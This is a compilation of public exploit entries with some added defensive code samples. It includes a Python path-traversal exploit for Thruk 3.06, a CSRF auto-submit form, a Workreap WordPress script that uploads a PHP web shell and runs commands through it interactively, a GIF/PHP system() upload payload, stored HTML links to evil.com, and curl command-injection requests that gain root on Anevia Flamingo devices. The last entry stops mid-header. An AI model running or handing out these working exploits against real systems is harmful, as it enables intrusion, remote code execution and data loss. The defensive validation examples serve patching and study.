# Exploit Title: Thruk Monitoring Web Interface 3.06 - Path Traversal # Date: 08-Jun-2023 # Exploit Author: Galoget Latorre (@galoget) # CVE: CVE-2023-34096 (Galoget Latorre) # Vendor Homepage: https://thruk.org/ # Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip # Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096 # CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html # GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h # Affected Versions: <= 3.06 # Language: Python 3.x # Tested on: # - Ubuntu 22.04.5 LTS 64-bit # - Debian GNU/Linux 10 (buster) 64-bit # - Kali GNU/Linux 2023.1 64-bit # - CentOS GNU/Linux 8.5.2111 64-bit #!/usr/bin/python3 # -*- coding:utf-8 -*- import sys import warnings import requests from bs4 import BeautifulSoup from termcolor import cprint # Usage: python3 exploit.py <target.site> # Example: python3 exploit.py http://127.0.0.1/thruk/ # Disable warnings warnings.filterwarnings('ignore') # Set headers headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" } def banner(): """ Function to print the banner """ banner_text = """ __ __ __ __ __ __ __ __ __ __ / \\ /|_ __ _) / \\ _) _) __ _) |__| / \\ (__\\ /__ \\__ \\/ |__ /__ \\__/ /__ __) __) | \\__/ __/ \\__) Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06 Exploit & CVE Author: Galoget Latorre (@galoget) LinkedIn: https://www.linkedin.com/in/galoget """ print(banner_text) def usage_instructions(): """ Function that validates the number of arguments. 
The application MUST have 2 arguments: - [0]: Name of the script - [1]: Target URL (Thruk Base URL) """ if len(sys.argv) != 2: print("Usage: python3 exploit.py <target.site>") print("Example: python3 exploit.py http://127.0.0.1/thruk/") sys.exit(0) def check_vulnerability(thruk_version): """ Function to check if the recovered version is vulnerable to CVE-2023-34096. Prints additional information about the vulnerability. """ try: if float(thruk_version[1:5]) <= 3.06: if float(thruk_version[4:].replace("-", ".")) < 6.2: cprint("[+] ", "green", attrs=['bold'], end = "") print("This version of Thruk is ", end = "") cprint("VULNERABLE ", "red", attrs=['bold'], end = "") print("to CVE-2023-34096!") print(" | CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html") print(" | GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h") print(" | CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096") print(" | CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096") print(" | Thruk Changelog: https://www.thruk.org/changelog.html") print(" | Fixed version: 3.06-2+") print("") return True else: cprint("[-] ", "red", attrs=['bold'], end = "") print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.") return False except: cprint("[-] ", "red", attrs=['bold'], end = "") print("There was an error parsing Thruk's version.\n") return False def get_thruk_version(): """ Function to get Thruk's version via web scraping. It also verifies the title of the website to check if the target is a Thruk instance. 
""" response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10) html_soup = BeautifulSoup(response.text, "html.parser") if "<title>Thruk Monitoring Webinterface</title>" not in response.text: cprint("[-] ", "red", attrs=['bold'], end = "") print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.") sys.exit(-1) else: # Extract version anchor tag version_link = html_soup.find_all("a", {"class": "link text-sm"}) if len(version_link) == 1 and version_link[0].has_attr('href'): thruk_version = version_link[0].text.strip() cprint("[+] ", "green", attrs=['bold'], end = "") print(f"Detected Thruk Version (Public Banner): {thruk_version}\n") return thruk_version else: cprint("[-] ", "red", attrs=['bold'], end = "") print("There was an error retrieving Thruk's version.") sys.exit(-1) def get_error_info(): """ Function to cause an error in the target Thruk instance and collect additional information via web scraping. """ # URL that will cause an error error_url = target + "//cgi-bin/login.cgi" # Retrieve Any initial Cookies error_response = requests.get(error_url, headers=headers, allow_redirects=False, verify=False, timeout=10) cprint("[*] ", "blue", attrs=['bold'], end = "") print("Trying to retrieve additional information...\n") try: # Search for the error tag html_soup = BeautifulSoup(error_response.text, "html.parser") error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text if len(error_report) > 0: # Print Error Info error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")] cprint("[+] ", "green", attrs=['bold'], end = "") print("Recovered Information: \n") parsed_error_report = error_report.split("\n") for error_line in parsed_error_report: print(f" {error_line}") except: cprint("[-] ", "red", attrs=['bold'], end = "") print("No additional information available.\n") def get_thruk_session_auto_login(): """ Function to login into the Thruk instance and 
```python
    retrieve a valid session. It will use default Thruk's credentials
    available here:
    - https://www.thruk.org/documentation/install.html
    Change credentials if required.
    """
    # Default Credentials - Change if required
    username = "thrukadmin"  # CHANGE ME
    password = "thrukadmin"  # CHANGE ME
    params = {"login": username, "password": password}

    cprint("[*] ", "blue", attrs=['bold'], end="")
    print(f"Trying to authenticate with provided credentials: {username}/{password}\n")

    # Define Login URL
    login_url = "cgi-bin/login.cgi"
    session = requests.Session()

    # Retrieve Any initial Cookies
    session.get(target, headers=headers, allow_redirects=True, verify=False)

    # Login and get thruk_auth Cookie
    session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False)

    # Get Cookies as dictionary
    cookies = session.cookies.get_dict()

    # Successful Login
    if cookies.get('thruk_auth') is not None:
        cprint("[+] ", "green", attrs=['bold'], end="")
        print("Successful Authentication!\n")
        cprint("[+] ", "green", attrs=['bold'], end="")
        print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n")
        return session
    # Failed Login
    else:
        if cookies.get('thruk_message') == "fail_message~~login%20failed":
            cprint("[-] ", "red", attrs=['bold'], end="")
            print("Login Failed, check your credentials.")
        sys.exit(401)


def cve_2023_34096_exploit_path_traversal(logged_session):
    """
    Function that attempts to exploit the Path Traversal Vulnerability.
    The exploit will try to upload a PoC file to multiple common folders.
    This is to prevent permission errors from causing false negatives.
    """
    cprint("[*] ", "blue", attrs=['bold'], end="")
    print("Trying to exploit: ", end="")
    cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold'])

    # Define Upload URL
    upload_url = "cgi-bin/panorama.cgi"

    # Absolute paths
    common_folders = ["/tmp/",
                      "/etc/thruk/plugins/plugins-enabled/",
                      "/etc/thruk/panorama/",
                      "/etc/thruk/bp/",
                      "/etc/thruk/thruk_local.d/",
                      "/var/www/",
                      "/var/www/html/",
                      "/etc/",
                      ]

    # Upload PoC file to each folder
    for target_folder in common_folders:
        # PoC file extension is jpg due to regex validations of Thruk.
        # Nevertheless this issue can still cause damage in different ways to the affected instance.
        files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")}
        data = {"task": "upload",
                "type": "image",
                "location": f"backgrounds/../../../..{target_folder}"
                }

        upload_response = logged_session.post(target + upload_url, data=data, files=files,
                                              headers=headers, allow_redirects=False, verify=False)

        try:
            upload_response = upload_response.json()
            # "Upload successfull" is the exact (misspelled) string returned by Thruk
            if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True:
                cprint("[+] ", "green", attrs=['bold'], end="")
                print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n")
            elif upload_response.get("msg") == "Fileupload must use existing and writable folder.":
                cprint("[-] ", "red", attrs=['bold'], end="")
                print(f"File upload to folder '{target_folder}{files.get('image')[0]}' failed due to write permissions or non-existent folder!\n")
            else:
                cprint("[-] ", "red", attrs=['bold'], end="")
                print("File upload failed.\n")
        except Exception:
            # Non-JSON response (e.g. HTML error page)
            cprint("[-] ", "red", attrs=['bold'], end="")
            print("File upload failed.\n")


if __name__ == "__main__":
    banner()
    usage_instructions()

    # Change this with the domain or IP address to attack
    if len(sys.argv) > 1 and sys.argv[1].startswith("http"):
        target = sys.argv[1]
    else:
        target = "http://127.0.0.1/thruk/"

    # Prepare Base Target URL
    if not target.endswith('/'):
        target += "/"

    cprint("[+] ", "green", attrs=['bold'], end="")
    print(f"Target URL: {target}\n")

    # Get Thruk version via web scraping
    scraped_thruk_version = get_thruk_version()

    # Send a request that will generate an error and collect extra info
    get_error_info()

    # Check if the instance is vulnerable to CVE-2023-34096
    vulnerable_status = check_vulnerability(scraped_thruk_version)

    if vulnerable_status:
        cprint("[+] ", "green", attrs=['bold'], end="")
        print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?")

        # Confirm exploitation
        option = input("\nChoice (Y/N): ").lower()
        print("")

        if option == "y":
            cprint("[*] ", "blue", attrs=['bold'], end="")
            print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n")

            # Login into Thruk instance
            valid_session = get_thruk_session_auto_login()

            # Exploit Path Traversal Vulnerability
            cve_2023_34096_exploit_path_traversal(valid_session)
        elif option == "n":
            cprint("[*] ", "blue", attrs=['bold'], end="")
            print("No exploitation attempts were performed, Goodbye!\n")
            sys.exit(0)
        else:
            cprint("[-] ", "red", attrs=['bold'], end="")
            print("Unknown option entered.")
            sys.exit(1)
    else:
        cprint("[-] ", "red", attrs=['bold'], end="")
        print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.")
        sys.exit(2)
```
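As an added, defender-side example (not part of the PoC script above and not Thruk's own code), the kind of server-side check that stops the `backgrounds/../../../..` location value: canonicalise the joined path and verify it is still under the upload root, by path component rather than string prefix. The upload root `/var/lib/thruk/panorama` and the subdirectory allowlist are constructed placeholders, and `naive_location_check` is a constructed illustration of the prefix-only check that the traversal string passes.

```python
import posixpath
from typing import Optional

# Constructed placeholder for the directory uploads may land in; not Thruk's real config.
UPLOAD_ROOT = "/var/lib/thruk/panorama"
ALLOWED_SUBDIRS = ("backgrounds", "images")


def naive_location_check(location: str) -> bool:
    """Constructed illustration of an insufficient check: it only looks at the
    leading path component, so 'backgrounds/../../../../tmp/' passes."""
    return location.startswith("backgrounds/")


def resolve_upload_location(location: str, root: str = UPLOAD_ROOT) -> Optional[str]:
    """Return the absolute directory a user-supplied `location` resolves to,
    or None when it would escape `root` or an allowed subdirectory.

    normpath() collapses '..' segments, and the containment test uses
    root + '/' so that a sibling such as '/var/lib/thruk/panorama2' does not
    pass a plain startswith() comparison."""
    if not location or "\x00" in location:
        return None
    # Strip leading separators so join() cannot discard `root` for absolute input.
    rel = location.lstrip("/\\")
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, rel))
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None  # escaped the upload root via '..'
    # The first component below root must be one of the allowed subdirectories.
    first = candidate[len(root_norm):].lstrip("/").split("/", 1)[0]
    if first not in ALLOWED_SUBDIRS:
        return None
    return candidate


if __name__ == "__main__":
    # The location value from the advisory, rejected; a legitimate one, accepted.
    print(resolve_upload_location("backgrounds/../../../../tmp/"))   # None
    print(resolve_upload_location("backgrounds/sub"))                # .../panorama/backgrounds/sub
```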
-
Online Examination System Project 1.0 - Cross-site request forgery (CSRF)
# Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)
# Google Dork: n/a
# Date: 09/06/2023
# Exploit Author: Ramil Mustafayev (kryptohaker)
# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
# CVE : n/a

Online Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin's consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.

To exploit this vulnerability, an attacker needs to do the following:

1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/
2. Identify the email address of a user account that the attacker wants to delete. For example, [email protected]
3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:

```html
<html>
<body>
<form action="http://example.com/update.php" method="GET">
<input type="hidden" name="demail" value="[email protected]" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```

4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html
5. Send the URL of the HTML page to the admin user via email, social media, or any other means.

If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin's consent or knowledge.
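As an added example (not part of the advisory and not the Online Examination System's code), a Python sketch of the server-side handling that defeats the forged form above: deletion is refused on GET, and a POST must carry a token bound to the admin's session with HMAC and compared in constant time. The `demail` parameter is the one the advisory shows; `csrf_token`, the session layout and the secret are assumptions.

```python
import hashlib
import hmac
import secrets


def _mac(secret: bytes, session_id: str, nonce: str) -> str:
    """HMAC over the session id and nonce, so a token is only valid for the
    session it was issued to."""
    return hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()


def issue_csrf_token(session: dict, secret: bytes) -> str:
    """Create a token to embed in the admin's own (same-origin) forms."""
    nonce = secrets.token_hex(16)
    return nonce + "." + _mac(secret, session["id"], nonce)


def verify_csrf_token(session: dict, secret: bytes, presented) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    if not isinstance(presented, str) or "." not in presented:
        return False
    nonce, mac = presented.split(".", 1)
    return hmac.compare_digest(mac, _mac(secret, session["id"], nonce))


def handle_delete_user(method: str, form: dict, session: dict, secret: bytes, users: dict):
    """Hypothetical replacement for the update.php deletion flow.
    Returns (http_status, message); `users` is an in-memory stand-in for the DB."""
    if method != "POST":
        # A forged auto-submitting GET form like the one in the advisory stops here.
        return 405, "account deletion must be a POST"
    if session.get("role") != "admin":
        return 403, "admin role required"
    if not verify_csrf_token(session, secret, form.get("csrf_token")):
        # A cross-site POST cannot read the admin's token, so it fails here.
        return 403, "missing or invalid CSRF token"
    email = form.get("demail")
    if email not in users:
        return 404, "no such user"
    del users[email]
    return 200, f"deleted {email}"


if __name__ == "__main__":
    secret = b"constructed-server-secret"            # constructed, would come from config
    session = {"id": "sess-1234", "role": "admin"}    # constructed admin session
    users = {"user@example.com": {}}                  # constructed user table
    token = issue_csrf_token(session, secret)
    print(handle_delete_user("GET", {"demail": "user@example.com"}, session, secret, users))
    print(handle_delete_user("POST", {"demail": "user@example.com", "csrf_token": token},
                             session, secret, users))
```

Setting the session cookie with `SameSite=Lax` or `Strict` is a second, independent layer; the token check above does not depend on it.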
-
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
# Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
# Dork: inurl:/wp-content/themes/workreap/
# Date: 2023-06-01
# Category : Webapps
# Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454
# Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l)
# Version: 2.2.2
# Tested on: Windows/Linux
# CVE: CVE-2021-24499

```python
import requests
import random
import string
import sys


def usage():
    banner = '''
NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution

usage: python3 Workreap_rce.py <URL>

example for linux   : python3 Workreap_rce.py https://www.exploit-db.com
example for Windows : python Workreap_rce.py https://www.exploit-db.com
'''
    print(f"{BOLD}{banner}{ENDC}")


def upload_file(target):
    print("[ ] Uploading File")
    url = target + "/wp-admin/admin-ajax.php"
    body = "<?php echo '" + random_str + "';?>"
    data = {"action": "workreap_award_temp_file_uploader"}
    response = requests.post(url, data=data, files={"award_img": (file_name, body)})
    if '{"type":"success",' in response.text:
        print(f"{GREEN}[+] File uploaded successfully{ENDC}")
        check_php_file(target)
    else:
        print(f"{RED}[+] File was not uploaded{ENDC}")


def check_php_file(target):
    # Fetch the uploaded file and check whether the marker string was echoed (i.e. PHP executed)
    response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name)
    if random_str in response_2.text:
        print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}")
        print("path: " + target + "/wp-content/uploads/workreap-temp/" + file_name)
        question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}")
        if question == "y" or question == "Y":
            print("[ ] Uploading Shell ")
            get_rce(target)
        else:
            usage()
    else:
        print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}")


def get_rce(target):
    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"
    body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>'
    data = {"action": "workreap_award_temp_file_uploader"}
    response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)})
    print(f"{GREEN}[+] Shell uploaded successfully{ENDC}")
    while True:
        command = input(f"{YELLOW}Enter a command to execute: {ENDC}")
        print(f"Shell Path : {target}/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}")
        response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}")
        print(f"{GREEN}{response_4.text}{ENDC}")


if __name__ == "__main__":
    GREEN = '\033[92m'
    RED = '\033[91m'
    YELLOW = '\033[93m'
    BOLD = '\033[1m'
    ENDC = '\033[0m'
    file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php"
    random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))
    try:
        upload_file(sys.argv[1])
    except IndexError:
        usage()
    except requests.exceptions.RequestException:
        print("\nPlease Enter Valid Address")
```
-
Teachers Record Management System 1.0 - File Upload Type Validation
Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation
Date: 17-01-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://phpgurukul.com>
Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3187

===============================
STEPS_TO_REPRODUCE
===============================

1. Login into Teacher-Account with the credentials “Username: [email protected]” “Password: Test@123”
2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
3. Open the Burp-suite and Intercept the Edit Image Request
4. In the POST Request change the “Filename” from “profile picture.png” to “profile picture.php.gif”
5. Change the **Content-type** from “image/png” to “image/gif”
6. And add this **Payload**: `GIF89a <?php echo system($_REQUEST['dx']); ?>`
7. Where **GIF89a is the GIF magic bytes; this bypasses the file upload extension check**
8. Below is the Burpsuite-POST Request for all the changes that I have made above

==========================================
BURPSUITE_REQUEST
==========================================

```http
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/trms/teacher/changeimage.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"

John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif

GIF89a <?php echo system($_REQUEST['dx']); ?>
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"


------WebKitFormBoundaryndAPYa0GGOxSUHdF--
```

===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md
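As an added example serving both upload advisories above (the unauthenticated Workreap `award_img` upload and the Teachers Record `profile picture.php.gif` trick), and not code from either project: an upload validator that rejects the two payloads for the reasons each advisory exposes. It requires authentication, allowlists only the final extension, refuses executable extensions anywhere in the name (so `x.php.gif` is out regardless of magic bytes), checks that the content starts with the bytes of the declared type, scans for embedded script markup as defence in depth, and never reuses the client-supplied name. `validate_upload`, the allowlists and the size limit are all assumptions.

```python
import os
import re
import secrets

# Allowed image types: final extension -> accepted leading magic bytes (constructed allowlist).
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
# Extensions that must not appear in any position of the name: some Apache
# mod_php/AddHandler setups execute 'name.php.gif' as PHP.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "cgi", "pl", "py", "sh"}
# Heuristic: a real image has no reason to contain a PHP open tag or a <script> tag.
SCRIPT_TAG = re.compile(rb"<\?(?:php\b|=)|<script\b", re.IGNORECASE)


def validate_upload(filename: str, content: bytes, authenticated: bool, max_size: int = 2 * 1024 * 1024):
    """Return (True, server_side_name) for an acceptable image, else (False, reason).

    The stored name is random with the validated extension, so the client
    never chooses the path; storing outside the web root or with PHP
    execution disabled for the uploads directory is the complementary
    server-side control."""
    if not authenticated:
        # Workreap's AJAX action was reachable without a session; refuse that outright.
        return False, "upload requires an authenticated user"
    if not content or len(content) > max_size:
        return False, "empty or oversized file"
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "missing extension"
    ext = parts[-1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} is not an allowed image type"
    if EXECUTABLE_EXTS.intersection(parts[1:-1]):
        return False, "executable extension inside the file name"
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match the declared image type"
    if SCRIPT_TAG.search(content):
        # Magic bytes alone pass 'GIF89a <?php ...>'; this catches the polyglot.
        return False, "image contains embedded script markup"
    return True, secrets.token_hex(8) + "." + ext


if __name__ == "__main__":
    # Constructed inputs mirroring the two advisories.
    print(validate_upload("profile picture.php.gif", b"GIF89a <?php echo system($_REQUEST['dx']); ?>", True))
    print(validate_upload("abc12345.php", b"<?php echo 'marker';?>", False))
    print(validate_upload("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16, True))
```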
-
Sales Tracker Management System v1.0 - Multiple Vulnerabilities
Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities
Google Dork: NA
Date: 09-06-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://www.sourcecodester.com/>
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3184

==============================
CREDENTIAL TO USE
==============================
ADMIN-ACCOUNT
USERNAME: admin
PASSWORD: admin123

=============================
PAYLOAD_USED
=============================
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>

===============================
STEPS_TO_REPRODUCE
===============================
1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN CREDENTIALS OF ADMIN
2. THEN NAVIGATE TO USER_LIST AND CLICK ON `CREATE NEW` BUTTON OR VISIT THIS URL: `http://localhost/php-sts/admin/?page=user/manage_user`
3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname`, `middlename`, `lastname` AND IN `username`
4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT THE NEW USER IS ADDED.
6. AFTER CLICKING ON EACH PAYLOAD IT REDIRECTS ME TO THE EVIL SITE

==========================================
BURPSUITE_REQUEST
==========================================

```http
POST /php-sts/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 1037
sec-ch-ua: 
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn
Connection: close

------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="id"


------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="firstname"

<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="middlename"

<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="lastname"

<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="username"

<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="password"

1234
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary7hwjNQW3mptDFOwo--
```

===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md
-
Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.5
                  Hardware revision: 1.1
                  SoapLive 2.4.0
                  SoapSystem 1.3.1

Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

Desc: The affected device suffers from an authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges.

Tested on: GNU/Linux 3.14.29 (x86_64)
           Apache/2.2.22 (Debian)
           PHP/5.6.0-0anevia2

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5778
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php

13.04.2023

--

```
$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data
<td>uid=33(www-data)</td>
<input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>
<td>gid=33(www-data)</td>
<input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>
<td>groups=33(www-data),6(disk),25(floppy)</td>
<input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>
```

---

```
$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root
<td>uid=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>
<td>gid=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>
<td>groups=0(root)</td>
<input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>
```
-
Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.20, 3.2.9
                  Hardware revision 1.1, 1.0
                  SoapLive 2.4.1, 2.0.3
                  SoapSystem 1.3.1

Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

Desc: The affected device suffers from an authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges.

Tested on: GNU/Linux 3.1.4 (x86_64)
           Apache/2.2.15 (Unix)
           mod_ssl/2.2.15
